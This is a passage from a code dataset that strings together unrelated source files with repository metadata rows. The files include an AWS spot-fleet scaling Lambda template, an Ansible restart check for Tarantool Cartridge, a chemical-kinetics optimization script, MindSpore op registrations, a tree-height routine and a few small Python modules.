"Statement": [{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {"Service": "lambda.amazonaws.com"},
}]
},
Policies=[
Policy(
PolicyName="ec2-spot-fleet-scaler",
PolicyDocument={
"Statement": [{
"Effect": "Allow",
"Action": [
"cloudwatch:Get*",
"ec2:DescribeSpotFleetRequests",
"ec2:ModifySpotFleetRequest",
"logs:*",
"ecs:ListContainerInstances",
"ecs:Update*",
"ecs:ListTasks",
"s3:GetEncryptionConfiguration"
],
"Resource": "*"
}, {
"Effect": "Allow",
"Action": [
"ssm:Get*",
"ssm:Put*",
"ssm:Delete*"
],
"Resource": [
{"Fn::Sub": "arn:aws:ssm:${AWS::Region}:${AWS::AccountId}:parameter/ecs-maestro/${ClusterName}/*"}
]
}]
}
),
Policy(
PolicyName="DeleteStack",
PolicyDocument={
"Statement": [{
"Effect": "Allow",
"Action": [
"lambda:InvokeFunction",
],
"Resource": [
{"Fn::Sub": "arn:aws:lambda:${AWS::Region}:${AWS::AccountId}:function:"+function_name+"ASGCleanupLambda"}]
}]
}
)
]
)
template.add_resource(autoscaling_role)
scaling_lambda = Function(
'ScalingLambda{}'.format(sanitize_cfn_resource_name(spot_fleet.get('name'))),
Code=Code(
S3Bucket=Sub("${S3Bucket}"),
S3Key=Sub("${S3Prefix}/deployment.zip")
),
Handler="scaling.scale_spot.lambda_handler",
Role=GetAtt(autoscaling_role, "Arn"),
Environment=Environment(
Variables={
"CLUSTER_NAME": Sub("${ClusterName}"),
"SPOT_FLEET": Ref(
"SpotFleet{}".format(
sanitize_cfn_resource_name(
spot_fleet.get('name')
)
)
),
"STATUS": Sub("${Status}"),
"VERSION": Sub("${Version}"),
"SCALE_IN_THRESHOLD": Sub("${SpotTaskThresholdIn}"),
"SCALE_OUT_THRESHOLD": Sub("${SpotTaskThresholdOut}"),
"MAX_WEIGHT": Sub("${SpotMaxWeight}"),
"MIN_WEIGHT": Sub("${SpotMinWeight}")
}
),
Timeout=900,
MemorySize=128,
Runtime="python3.7",
)
template.add_resource(scaling_lambda)
CronScaling = Rule(
"CronScaling{}".format(
sanitize_cfn_resource_name(spot_fleet.get('name'))
),
ScheduleExpression="rate(1 minute)",
Description="Cron for cluster stats",
Targets=[
Target(
Id="1",
Arn=GetAtt(scaling_lambda, "Arn"))
]
)
template.add_resource(CronScaling)
ScalingPerm = Permission(
"ScalePerm{}".format(
sanitize_cfn_resource_name(spot_fleet.get('name'))
),
Action="lambda:InvokeFunction",
FunctionName=GetAtt(scaling_lambda, "Arn"),
Principal="events.amazonaws.com",
SourceArn=GetAtt(CronScaling, "Arn")
)
template.add_resource(ScalingPerm)
| 36.961538 | 134 | 0.475338 | [
"MIT"
] | apollusehs-devops/ecs-cluster-deployer | ecs_cluster_deployer/compute/lambda_scaler.py | 4,805 | Python |
#!/usr/bin/python
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.helpers import ModuleRes, CartridgeException, cartridge_errcodes
from ansible.module_utils.helpers import get_control_console
from ansible.module_utils.helpers import dynamic_box_cfg_params
import os
argument_spec = {
'restarted': {'required': False, 'type': 'bool'},
'control_sock': {'required': True, 'type': 'str'},
'appname': {'required': True, 'type': 'str'},
'instance_conf_file': {'required': True, 'type': 'str'},
'conf_section_name': {'required': True, 'type': 'str'},
'cluster_cookie': {'required': True, 'type': 'str'},
'cartridge_defaults': {'required': True, 'type': 'dict'},
'config': {'required': True, 'type': 'dict'},
'stateboard': {'required': True, 'type': 'bool'}
}
def read_yaml_file_section(filepath, control_console, section):
sections = control_console.eval('''
local file = require('fio').open('{}')
if file == nil then
error('Failed to open instance config file')
end
local buf = {{}}
while true do
local val = file:read(1024)
if val == nil then
error('Failed to read from instance config file')
elseif val == '' then
break
end
table.insert(buf, val)
end
file:close()
local data = table.concat(buf, '')
local ok, ret = pcall(require('yaml').decode, data)
if not ok then
error('Failed to decode instance config from YAML')
end
return ret
'''.format(filepath))
if section not in sections:
errmsg = 'File {} does not contain section: {}'.format(filepath, section)
raise CartridgeException(cartridge_errcodes.MISSED_SECTION, errmsg)
return sections[section]
def check_conf_updated(new_conf, old_conf, ignore_keys=[]):
# check new conf keys
for key, value in new_conf.items():
if key not in ignore_keys:
if key not in old_conf or old_conf[key] != value:
return True
# check old conf keys
for key, value in old_conf.items():
if key not in ignore_keys:
if key not in new_conf or new_conf[key] != value:
return True
return False
def get_current_cfg(control_console):
return control_console.eval('''
return type(box.cfg) ~= 'function' and box.cfg or box.NULL
''')
def needs_restart(params):
restarted = params['restarted']
if restarted is True:
return ModuleRes(success=True, changed=True)
if restarted is False:
return ModuleRes(success=True, changed=False)
stateboard = params['stateboard']
control_sock = params['control_sock']
appname = params['appname']
new_default_conf = params['cartridge_defaults']
new_instance_conf = params['config']
cluster_cookie = params['cluster_cookie']
instance_conf_file = params['instance_conf_file']
conf_section_name = params['conf_section_name']
default_conf_path = '/etc/tarantool/conf.d/{}.yml'.format(appname)
app_code_path = '/usr/share/tarantool/{}'.format(appname)
# check if instance was not started yet
if not os.path.exists(control_sock):
return ModuleRes(success=True, changed=True)
try:
control_console = get_control_console(control_sock)
except CartridgeException as e:
allowed_errcodes = [
cartridge_errcodes.SOCKET_NOT_FOUND,
cartridge_errcodes.FAILED_TO_CONNECT_TO_SOCKET,
cartridge_errcodes.INSTANCE_IS_NOT_STARTED_YET
]
if e.code in allowed_errcodes:
return ModuleRes(success=True, changed=True)
last_restart_time = os.path.getmtime(control_sock)
# check if application code was updated
package_update_time = os.path.getmtime(app_code_path)
if last_restart_time < package_update_time:
return ModuleRes(success=True, changed=True)
# check if instance config was changed (except memtx_memory)
current_instance_conf = read_yaml_file_section(
instance_conf_file,
control_console,
conf_section_name
)
if check_conf_updated(new_instance_conf, current_instance_conf, dynamic_box_cfg_params):
return ModuleRes(success=True, changed=True)
if not stateboard:
# check if default config was changed (except memtx_memory)
current_default_conf = read_yaml_file_section(
default_conf_path,
control_console,
appname
)
new_default_conf.update({'cluster_cookie': cluster_cookie})
if check_conf_updated(new_default_conf, current_default_conf, dynamic_box_cfg_params):
return ModuleRes(success=True, changed=True)
current_cfg = get_current_cfg(control_console)
for param_name in dynamic_box_cfg_params:
new_value = None
if param_name in new_instance_conf:
new_value = new_instance_conf[param_name]
elif not stateboard and param_name in new_default_conf:
new_value = new_default_conf[param_name]
# This code is ran after attempt to change parameter in runtime
# If current parameter wasn't changed to the new value,
# it mean that instance should be restarted to apply change
if new_value is not None:
if current_cfg[param_name] != new_value:
return ModuleRes(success=True, changed=True)
return ModuleRes(success=True, changed=False)
def main():
module = AnsibleModule(argument_spec=argument_spec)
try:
res = needs_restart(module.params)
except CartridgeException as e:
module.fail_json(msg=str(e))
if res.success is True:
module.exit_json(changed=res.changed, meta=res.meta)
else:
module.fail_json(msg=res.msg)
if __name__ == '__main__':
main()
| 33.508475 | 94 | 0.662452 | [
"BSD-2-Clause"
] | armohamm/ansible-cartridge | library/cartridge_needs_restart.py | 5,931 | Python |
import sys, os
sys.path.append('../../') #get rid of this at some point with central test script or when package is built
os.chdir('../../')
import MSI.simulations.instruments.shock_tube as st
import MSI.cti_core.cti_processor as pr
import MSI.optimization.matrix_loader as ml
import MSI.optimization.opt_runner as opt
import MSI.simulations.absorbance.curve_superimpose as csp
import MSI.simulations.yaml_parser as yp
import MSI.optimization.shock_tube_optimization_shell_six_param_fit as stMSIspf
import cantera as ct
import pandas as pd
import numpy as np
import MSI.utilities.plotting_script as plotter
import MSI.utilities.post_processor as post_processor
files_to_include = [['Pirraglia_0.yaml']]
numer_of_iterations = 3
cti_file = 'glarborg_custom.cti'
working_directory = 'MSI/data/H_O2'
reaction_uncertainty_csv = 'glarborg_reaction_uncertainty.csv'
master_reaction_equation_cti_name = 'master_reactions_glarborg.cti'
#rate_constant_target_value_data = 'burke_target_value_single_reactions.csv'
#this would be an empty string '' if you do not want to include it
run_with_k_target_values = 'On'
master_equation_reactions = ['H2O2 + OH <=> H2O + HO2',
'2 HO2 <=> H2O2 + O2',
'HO2 + OH <=> H2O + O2',
'2 OH <=> H2O + O',
'CH3 + HO2 <=> CH4 + O2',
'CH3 + HO2 <=> CH3O + OH']
#master_index = [2,3,4,5,6,7]
master_index = [2,3,4,5,6,7]
master_equation_uncertainty_df = pd.read_csv('MSI/data/H_O2/six_parameter_fit_large_uncertainty.csv')
#this could be 'On'
rate_constant_target_value_data_for_plotting = 'FFCM1_target_reactions_1_plotting.csv'
rate_constant_target_value_data = 'FFCM1_target_reactions_1.csv'
rate_constant_target_value_data_extra = 'FFCM1_target_reactions_extra_data.csv'
#start here
six_parameter_fit_sensitivities = {'H2O2 + OH <=> H2O + HO2':{'A':np.array([-13.37032086, 32.42060027, 19.23022032, 6.843287462 , 36.62853824 ,-0.220309785 ,-0.099366346, -4.134352081]),
'n':np.array([1.948532282, -5.341557065, -3.337497841, -1.025292166, -5.813524857, 0.011862923 ,0.061801326, 0.581628835]),
'Ea':np.array([-0.463042822, 1.529151218, 0.808025472 ,0.359889935, -0.021309254, -0.098013004, -0.102022118, -0.097024727]),
'c':np.array([0.00163576, -0.008645666, -0.003111179, -0.002541995, 0.014228149 ,0.001263134, 0.001236963, -0.000390567]),
'd':np.array([1.071992802, -2.780550365, -1.71391034 ,-0.274481751, -4.491132406, -0.054960894, 0.049553379, 0.270885383]),
'f':np.array([-0.027060156, 0.056903076, 0.041102936 ,0.001361221, 0.144385439, 0.003136796 ,0.001374015, -0.006089248])},
'2 HO2 <=> H2O2 + O2': {'A':np.array([-12.93733217, 24.39245077 ,17.73177606, 4.37803475, 33.44985889, 0.381601192 ,3.748890308]),
'n':np.array([1.872602872, -4.096806067, -3.09439453 ,-0.63226683, -5.125008418, -0.061610462, -0.677953862]),
'Ea':np.array([-0.463903763 ,1.259537237, 0.826684258 ,0.257400116, 0.803882706 ,2.20E-05, 0.181336266]),
'c':np.array([0.002069572, -0.008314769, -0.00424128 ,-0.002016113, 0.000134642 ,0.000122049 ,-0.001026567]),
'd':np.array([0.981856324, -1.847383095, -1.493544053, 0.016222685, -3.428753345, -0.050708107, -0.526284003]),
'f':np.array([-0.022628436, 0.023558844, 0.031573523 ,-0.00732987, 0.096573278 ,0.001668073, 0.01033547])},
'HO2 + OH <=> H2O + O2': {'A':np.array([-4.795727446, 6.426354909 ,4.878258417, 2.472791017, 7.856296474, 1.328033302 ,-3.457932692, -0.349839371, 2.331070924 ,2.403555921, -0.165397001, 0.246540172 ,0.722946077]),
'n':np.array([0.624241134, -1.321082842, -1.032242319, -0.36532386, -1.112545721, -0.188622956, 0.421083939 ,0.038859478 ,-0.360855106, -0.38989218, 0.029669899 ,-0.04371581, -0.130487515]),
'Ea':np.array([-0.259799111, 0.205620792 ,0.130799794, 0.137023666 ,0.379232542, 6.19E-02, -0.198196699, -0.023548432, 0.118069394 ,0.104383314 ,-0.003830947, 0.011566499 ,-0.073557828]),
'c':np.array([0.00161312, -0.001906694, -0.000863021, -0.00105112 ,-0.002185605, -0.000334461, 0.001817049 ,0.000170761, -0.000859313, -0.000653029, -3.11E-06 ,-6.37E-05, 0.00047058]),
'd':np.array([0.124499363, -0.645652135, -0.535188558, 0.052734001 ,-0.45181066, -0.082250635, 0.034779283, -0.011522821, 0.017057742, -0.165960963, 0.057288687, -0.012776017, -0.192422381]),
'f':np.array([0.002033109, -0.011099716, 0.005351213 ,-0.007623667, 0.005327017 ,0.001259485,0.00245957, 0.000976725 ,-0.004879845, 0.001903886 ,-0.001838669 ,0.000252269, 0.004691829])},
'2 OH <=> H2O + O': {'A': np.array([-5.40485067, 18.96061659 ,8.089301961, 6.953940096 ,-12.54280438, -3.264972401, 2.106487623 ,-1.657943467, 1.614935 ,-1.536463599]),
'n': np.array([0.803274875, -3.167851673, -1.607661056, -1.041258197, 1.679914849, 0.466415264 ,-0.326136934, 0.355297684 ,-0.16618967, 0.253903734]),
'Ea': np.array([0.147285831, 0.605814544, -0.062253282, 0.372322712, -1.884116555, -0.281992263, 0.099465537 ,0.030650483, 0.176069015 ,-0.056967886]),
'c': np.array([-0.003001658, -0.001870536, 0.003820535 ,-0.002753277, 0.014224162, 0.00032969 ,-0.000627241, -0.001081979, -0.002009835, 0.000255318]),
'd':np.array([0.446957978, -1.467039994, -1.298391635, -0.402720385, 0.568106728 ,0.229877892, -0.194395052, 1.033858025 ,0.527183366, 0.308743056]),
'f':np.array([-0.010053913, 0.025128322, 0.035579811 ,0.00515753 ,-0.0083511, -0.00512885, 0.003954, -0.029711993 ,-0.01986861, -0.007691647])},
'CH3 + HO2 <=> CH4 + O2': {'A':np.array([.007845,-.89278,-.94908]),
'n':np.array([-0.00104,-.36888,.154462]),
'Ea':np.array([.504278,-.44379,-0.03181]),
'c':np.array([0,0,0]),
'd':np.array([0,0,0]),
'f':np.array([0,0,0])},
'CH3 + HO2 <=> CH3O + OH': {'A':np.array([1.319108,-.92151]),
'n':np.array([-.04282,.150846]),
'Ea':np.array([0.024285,-0.02956]),
'c':np.array([0,0]),
'd':np.array([0,0]),
'f':np.array([0,0])}}
molecular_parameter_sensitivities = {'H2O2 + OH <=> H2O + HO2':{'A':np.array([-0.373074255, -5.658058364,-2.203911028,1.69333527,-7.110529947,-0.272049596,1.373125254,-0.644666166]),
'n':np.array([0.043611058, 0.15417925, -0.208413633, -0.306031876, 0.81053055, 0.031772359 ,-0.136901806, 0.073807424]),
'Ea':np.array([0.419762882, -1.301125209, -0.681648059, -0.091866582, -2.353326781, -0.064230907, 0.047721593 ,0.147941186])},
'2 HO2 <=> H2O2 + O2': {'A':np.array([-0.166005487, -6.797175212, -2.798300682, 1.973896891 ,-4.354910767, -0.082067357, -3.839749825]),
'n':np.array([0.018748596, 0.294710827 ,-0.135488286, -0.332967052, 0.4930396, 0.009470627 ,0.409095255]),
'Ea':np.array([0.459015825, -1.401810899, -0.722040616, -0.066133729, -1.52807633 ,-0.021832631, -0.411667639])},
'HO2 + OH <=> H2O + O2': {'A':np.array([-1.30109642, -11.63457509, -4.680271526, 0.782373804 , -0.016083278, 0.005513255 ,-1.738426278, -0.232013539, 0.884067816 ,-0.500473791, 0.399272687 ,0.062255923 ,-1.667253993]),
'n':np.array([0.152797314, 1.1181845, 0.306250902 ,-0.164846884, -0.008229148, -0.001531881, 0.195875814 ,0.026844834, -0.18238354 ,0.017363927, -0.055634983 ,-0.017324495, 0.218771679]),
'Ea':np.array([0.101558432, -1.638858106, -0.704325409, -0.119041648, -0.307281167, -0.04872945, 0.001603412 ,0.000324159, -0.08089174, -0.148811902, 0.027266121 ,-0.002907638, -0.237949453])},
'2 OH <=> H2O + O': {'A': np.array([0.299144373, -2.662684629, -6.643003014, 0.370230493 ,-3.354253502, -0.271981922, -0.581195748, 9.774024441 , 5.90328859, 2.272800133]),
'n': np.array([-0.028599275, -0.071787028, 0.572722706 ,-0.109709456, 0.381272207 ,0.03153973 ,0.061282516, -1.341475144, -0.835422411, -0.302994441]),
'Ea': np.array([0.535103651, -1.054606857, -0.989721261, -0.169631331, -1.099840578, -0.069647609, -0.101285313, 0.74522721, 0.352517552 ,0.205464658])},
'CH3 + HO2 <=> CH4 + O2': {'A':np.array([.007845,-.89278,-.94908]),
'n':np.array([-0.00104,-.36888,.154462]),
'Ea':np.array([.504278,-.44379,-0.03181])},
'CH3 + HO2 <=> CH3O + OH': {'A':np.array([1.319108,-.92151]),
'n':np.array([-.04282,.150846]),
'Ea':np.array([0.024285,-0.02956])}}
six_parameter_fit_nominal_parameters_dict = {'H2O2 + OH <=> H2O + HO2':{'A':4.64E-06,'n':5.605491008,'Ea':-5440.266692,'c':126875776.1,'d':0.000441194,'f':-5.35E-13},
'2 HO2 <=> H2O2 + O2':{'A':1.30E+04,'n':1.997152351,'Ea':-3628.04407,'c':93390973.44,'d':-0.000732521,'f':8.20E-12} ,
'HO2 + OH <=> H2O + O2':{'A':1.41E+18,'n':-2.05344973,'Ea':-232.0064051,'c':15243859.12,'d':-0.001187694,'f':8.01E-12},
'2 OH <=> H2O + O':{'A':354.5770856,'n':2.938741717,'Ea':-1836.492972,'c':12010735.18,'d':-4.87E-05,'f':1.22E-12},
'CH3 + HO2 <=> CH4 + O2':{'A':3.19e3,'n':2.670857,'Ea':-4080.73,'c':0.0,'d':0.0,'f':0.0},
'CH3 + HO2 <=> CH3O + OH':{'A':8.38e11,'n':.29,'Ea':-785.45,'c':0.0,'d':0.0,'f':0.0}}
MSI_st_instance_one = stMSIspf.MSI_shocktube_optimization_six_parameter_fit(cti_file,
.01,
1,
1,
working_directory,
files_to_include,
reaction_uncertainty_csv,rate_constant_target_value_data,
master_equation_reactions = master_equation_reactions,
molecular_parameter_sensitivities = molecular_parameter_sensitivities,
six_parameter_fit_sensitivities = six_parameter_fit_sensitivities,
master_reaction_equation_cti_name = master_reaction_equation_cti_name,
master_index = master_index,
master_equation_uncertainty_df = master_equation_uncertainty_df,
six_paramter_fit_nominal_parameters_dict = six_parameter_fit_nominal_parameters_dict)
MSI_st_instance_one.one_run_shock_tube_optimization()
S_matrix_original = MSI_st_instance_one.S_matrix
exp_dict_list_original = MSI_st_instance_one.experiment_dictonaries
original_covariance = MSI_st_instance_one.covarience
X_one_itteration = MSI_st_instance_one.X
MSI_st_instance_one.deltaXAsNsEas
#need to fix this and return _s_matrix and y_matrix
MSI_st_instance_two = stMSIspf.MSI_shocktube_optimization_six_parameter_fit(cti_file,
.01,
1,
1,
working_directory,
files_to_include,
reaction_uncertainty_csv,rate_constant_target_value_data,
master_equation_reactions = master_equation_reactions,
molecular_parameter_sensitivities = molecular_parameter_sensitivities,
six_parameter_fit_sensitivities = six_parameter_fit_sensitivities,
master_reaction_equation_cti_name = master_reaction_equation_cti_name,
master_index = master_index,
master_equation_uncertainty_df = master_equation_uncertainty_df,
six_paramter_fit_nominal_parameters_dict = six_parameter_fit_nominal_parameters_dict)
#
#
#
#
#
#ALL OF THIS STUFF CAN PROBABLY GO INTO SOME SORT OF CLASS
delta_X_list = MSI_st_instance_two.multiple_shock_tube_runs(numer_of_iterations)
deltaXAsNsEas = MSI_st_instance_two.deltaXAsNsEas
physical_obervable_updates_list = MSI_st_instance_two.physical_obervable_updates_list
absorbance_observables_updates_list = MSI_st_instance_two.absorbance_coef_update_dict
Ydf = MSI_st_instance_two.Y_data_frame
Zdf = MSI_st_instance_two.z_data_frame
experimental_dicts = MSI_st_instance_two.experiment_dictonaries
z_matrix = MSI_st_instance_two.z_matrix
s_matrix = MSI_st_instance_two.s_matrix
y = MSI_st_instance_two.y_matrix
Y_matrix = MSI_st_instance_two.Y_matrix
S_matrix = MSI_st_instance_two.S_matrix
X = MSI_st_instance_two.X
Xdf = MSI_st_instance_two.X_data_frame
covarience = MSI_st_instance_two.covarience
exp_dict_list_optimized_extra_reaction = MSI_st_instance_two.experiment_dictonaries
parsed_yaml_list = MSI_st_instance_two.list_of_parsed_yamls
sigma = MSI_st_instance_two.sigma
X = MSI_st_instance_two.X
delta_X = MSI_st_instance_two.delta_X
molecular_parameter_updates = MSI_st_instance_two.delta_x_molecular_params_by_reaction_dict
nominal_dict_six_p_fit = MSI_st_instance_two.six_paramter_fit_nominal_parameters_dict
original_diag = np.diag(original_covariance)
#target_value_rate_constant_csv = 'MSI/data/test_data/FFCM1_custom_target_value_test.csv'
original_cti_file = MSI_st_instance_two.data_directory +'/'+ MSI_st_instance_two.cti_file_name
experiment_dict_uncertainty = MSI_st_instance_two.experiment_dict_uncertainty_original
target_value_csv = MSI_st_instance_two.data_directory +'/'+ MSI_st_instance_two.k_target_values_csv
six_parameter_fit_dict_optimized = MSI_st_instance_two.updated_six_parameter_fits_dict
if run_with_k_target_values == 'On' or run_with_k_target_values == 'on':
k_target_value_S_matrix = MSI_st_instance_two.k_target_values_for_s
else:
k_target_value_S_matrix = None
##########################################################################################################################
#PLOTTING##
##########################################################################################################################
#csv_file_sigma = MSI_st_instance_two.data_directory +'/'+'sigma_for_uncertainty_weighted_sensitivity_FFCM1.csv'
csv_file_sigma = MSI_st_instance_two.data_directory +'/'+'sigma_for_uncertainty_weighted_sensitivity_glarborg.csv'
#csv_file_sigma = ''
plotting_instance = plotter.Plotting(S_matrix,
s_matrix,
Y_matrix,
Y_matrix,
z_matrix,
X,
sigma,
covarience,
original_covariance,
S_matrix_original,
exp_dict_list_optimized_extra_reaction,
exp_dict_list_original,
parsed_yaml_list,
Ydf,
target_value_rate_constant_csv= MSI_st_instance_two.data_directory +'/'+ rate_constant_target_value_data_for_plotting ,
target_value_rate_constant_csv_extra_values = MSI_st_instance_two.data_directory +'/'+rate_constant_target_value_data_extra,
k_target_value_S_matrix =k_target_value_S_matrix,
k_target_values=run_with_k_target_values,
working_directory = working_directory,
sigma_uncertainty_weighted_sensitivity_csv=csv_file_sigma)
#csv_file_sigma = MSI_st_instance_two.data_directory +'/'+'sigma_for_uncertainty_weighted_sensitivity_updated.csv'
observable_counter_and_absorbance_wl,length_of_experimental_data = plotting_instance.lengths_of_experimental_data()
sigmas_optimized,test = plotting_instance.calculating_sigmas(S_matrix,covarience)
sigmas_original,test2 = plotting_instance.calculating_sigmas(S_matrix_original,original_covariance)
plotting_instance.plotting_observables(sigmas_original = sigmas_original,sigmas_optimized= sigmas_optimized)
diag = plotting_instance.getting_matrix_diag(covarience)
#plotting_instance.Y_matrix_plotter(Y_matrix,exp_dict_list_optimized,y,sigma)
#
#
#plotting_instance.plotting_rate_constants(optimized_cti_file=MSI_st_instance_two.new_cti_file,
# original_cti_file=original_cti_file,
# initial_temperature=250,
# final_temperature=2500)
sensitivity, top_sensitivity = plotting_instance.sort_top_uncertainty_weighted_sens()
obs = plotting_instance.plotting_uncertainty_weighted_sens()
plotting_instance.plotting_rate_constants_six_paramter_fit(optimized_cti_file=MSI_st_instance_two.new_cti_file,
original_cti_file=original_cti_file,
initial_temperature=250,
final_temperature=2500,
master_equation_reactions = master_equation_reactions,
six_parameter_fit_dict_optimized = six_parameter_fit_dict_optimized,
six_parameter_fit_dict_nominal = six_parameter_fit_nominal_parameters_dict,
six_parameter_fit_sensitivity_dict =six_parameter_fit_sensitivities )
#plotting_instance.plotting_X_itterations(list_of_X_values_to_plot = [0,1,2,3,4,5,50],list_of_X_array=X_list,number_of_iterations=numer_of_iterations)
post_processor_instance = post_processor.post_processing(optimized_cti_file = MSI_st_instance_two.new_cti_file,
original_cti_file = original_cti_file,
kinetic_paramter_dictonary = MSI_st_instance_two.kinetic_paramter_dict,
master_equation_reactions=master_equation_reactions,
six_parameter_fit_nominal_parameters_dict = six_parameter_fit_nominal_parameters_dict,
six_parameter_fit_optimized_paramter_dict = six_parameter_fit_dict_optimized,
exp_dict_list_optimized = exp_dict_list_optimized_extra_reaction,
exp_dict_list_original = exp_dict_list_original,
parsed_yaml_list = parsed_yaml_list)
kinetic_paramters_dict = post_processor_instance.create_active_kinetic_paramter_dictonary()
physical_params_dict = post_processor_instance.create_active_physical_paramter_dictonary()
| 77.023973 | 279 | 0.537504 | [
"MIT"
] | TheBurkeLab/MSI | tests/shock_tube_optimization_shell_six_paramter_fit_test_modified.py | 22,491 | Python |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""StackPush and StackPop op"""
from mindspore.ops.op_info_register import op_info_register, AiCPURegOp, DataType
stack_init_op_info = AiCPURegOp("StackInit") \
.fusion_type("OPAQUE") \
.attr("index", "int") \
.get_op_info()
stack_push_op_info = AiCPURegOp("StackPush") \
.fusion_type("OPAQUE") \
.input(0, "src", "required") \
.attr("index", "int") \
.dtype_format(DataType.U8_Default) \
.dtype_format(DataType.U16_Default) \
.dtype_format(DataType.U32_Default) \
.dtype_format(DataType.U64_Default) \
.dtype_format(DataType.I8_Default) \
.dtype_format(DataType.I16_Default) \
.dtype_format(DataType.I32_Default) \
.dtype_format(DataType.I64_Default) \
.dtype_format(DataType.F16_Default) \
.dtype_format(DataType.F32_Default) \
.dtype_format(DataType.F64_Default) \
.dtype_format(DataType.BOOL_Default) \
.get_op_info()
stack_pop_op_info = AiCPURegOp("StackPop") \
.fusion_type("OPAQUE") \
.output(0, "dst", "required") \
.attr("index", "int") \
.dtype_format(DataType.U8_Default) \
.dtype_format(DataType.U16_Default) \
.dtype_format(DataType.U32_Default) \
.dtype_format(DataType.U64_Default) \
.dtype_format(DataType.I8_Default) \
.dtype_format(DataType.I16_Default) \
.dtype_format(DataType.I32_Default) \
.dtype_format(DataType.I64_Default) \
.dtype_format(DataType.F16_Default) \
.dtype_format(DataType.F32_Default) \
.dtype_format(DataType.F64_Default) \
.dtype_format(DataType.BOOL_Default) \
.get_op_info()
stack_destroy_op_info = AiCPURegOp("StackDestroy") \
.fusion_type("OPAQUE") \
.attr("index", "int") \
.get_op_info()
@op_info_register(stack_init_op_info)
def _stack_init_aicpu():
"""StackInit aicpu register"""
return
@op_info_register(stack_push_op_info)
def _stack_push_aicpu():
"""StackPush aicpu register"""
return
@op_info_register(stack_pop_op_info)
def _stack_pop_aicpu():
"""StackPop aicpu register"""
return
@op_info_register(stack_destroy_op_info)
def _stack_destroy_aicpu():
"""StackDestroy aicpu register"""
return
| 31.920455 | 81 | 0.700961 | [
"Apache-2.0"
] | 233-puchi/mindspore | mindspore/ops/_op_impl/aicpu/stack_push_pop.py | 2,809 | Python |
from tree import TreeNode
def min_depth(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if root is None:
return 0
if root.left is not None or root.right is not None:
return max(self.minDepth(root.left), self.minDepth(root.right))+1
return min(self.minDepth(root.left), self.minDepth(root.right)) + 1
# iterative
def min_height(root):
if root is None:
return 0
height = 0
level = [root]
while level:
height += 1
new_level = []
for node in level:
if node.left is None and node.right is None:
return height
if node.left is not None:
new_level.append(node.left)
if node.right is not None:
new_level.append(node.right)
level = new_level
return height
def print_tree(root):
if root is not None:
print(root.val)
print_tree(root.left)
print_tree(root.right)
if __name__ == '__main__':
tree = TreeNode(10)
tree.left = TreeNode(12)
tree.right = TreeNode(15)
tree.left.left = TreeNode(25)
tree.left.left.right = TreeNode(100)
tree.left.right = TreeNode(30)
tree.right.left = TreeNode(36)
height = min_height(tree)
print_tree(tree)
print("height:", height)
| 23.963636 | 73 | 0.593323 | [
"MIT"
] | AdrialYeoh/algorithms | algorithms/tree/min_height.py | 1,318 | Python |
import argparse
import ceserver
import tensorflow as tf
tf.keras.backend.clear_session()
from .model import AlibiDetectModel
DEFAULT_MODEL_NAME = "model"
parser = argparse.ArgumentParser(parents=[ceserver.server.parser])
parser.add_argument('--model_name', default=DEFAULT_MODEL_NAME,
help='The name that the model is served under.')
parser.add_argument('--storage_uri', required=True,
help='A URI pointer to the model')
args, _ = parser.parse_known_args()
if __name__ == "__main__":
model = AlibiDetectModel(args.model_name, args.storage_uri)
ceserver.CEServer().start(model)
| 28.681818 | 68 | 0.729002 | [
"Apache-2.0"
] | NunoEdgarGFlowHub/alibi-detect | integrations/adserver/adserver/__main__.py | 631 | Python |
__author__ = 'Bohdan Mushkevych'
from odm.fields import BooleanField, StringField, DictField, ListField, NestedDocumentField
from odm.document import BaseDocument
from synergy.db.model.job import Job
from synergy.db.model.managed_process_entry import ManagedProcessEntry
from synergy.db.model.freerun_process_entry import FreerunProcessEntry
from synergy.db.model.timetable_tree_entry import TimetableTreeEntry
class RestFreerunSchedulerEntry(FreerunProcessEntry):
is_alive = BooleanField()
next_run_in = StringField()
class RestManagedSchedulerEntry(ManagedProcessEntry):
is_alive = BooleanField()
next_run_in = StringField()
next_timeperiod = StringField()
reprocessing_queue = ListField()
class RestTimetableTree(TimetableTreeEntry):
dependant_trees = ListField()
sorted_process_names = ListField()
processes = DictField()
class RestJob(Job):
time_qualifier = StringField()
number_of_children = StringField()
class RestTimetableTreeNode(BaseDocument):
node = NestedDocumentField(RestJob, null=True)
children = DictField()
| 28.657895 | 91 | 0.795225 | [
"BSD-3-Clause"
] | mushkevych/scheduler | synergy/mx/rest_model.py | 1,089 | Python |
from winning.lattice_copula import gaussian_copula_margin_0
from winning.lattice import skew_normal_density
from winning.lattice_plot import densitiesPlot
from pprint import pprint
def test_ensure_scipy():
from winning.scipyinclusion import using_scipy
from scipy.integrate import quad_vec
assert using_scipy
def test_five_skew():
mus = [-0.5, -0.25, 0, 1, 1.5]
scales = [1.0, 1.5, 1.2, 1.3, 2.0]
densities = [skew_normal_density(L=500, unit=0.01, scale=scale, loc=mu, a=1.0) for mu, scale in zip(mus, scales)]
margin_0 = gaussian_copula_margin_0(densities, rho=0.9)
return densities[0], margin_0
if __name__=='__main__':
density1, density2 = test_five_skew()
legend = ['margin','reconstructed']
densitiesPlot(densities=[density1,density2], unit=0.1, legend=legend)
print(sum(density2))
| 29.103448 | 117 | 0.727488 | [
"MIT"
] | microprediction/winning | tests/test_lattice_five_margin.py | 844 | Python |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import os
from django.core.management.base import BaseCommand
from django.conf import settings
from lib.l10n_utils.gettext import merge_lang_files
class Command(BaseCommand):
help = 'Merges gettext strings into .lang files'
def add_arguments(self, parser):
# Positional arguments
parser.add_argument('langs', nargs='*')
def handle(self, *args, **options):
langs = options['langs']
if not langs:
langs = os.listdir(os.path.join(settings.ROOT, 'locale'))
langs = filter(lambda x: x != 'templates', langs)
langs = filter(lambda x: x[0] != '.', langs)
merge_lang_files(langs)
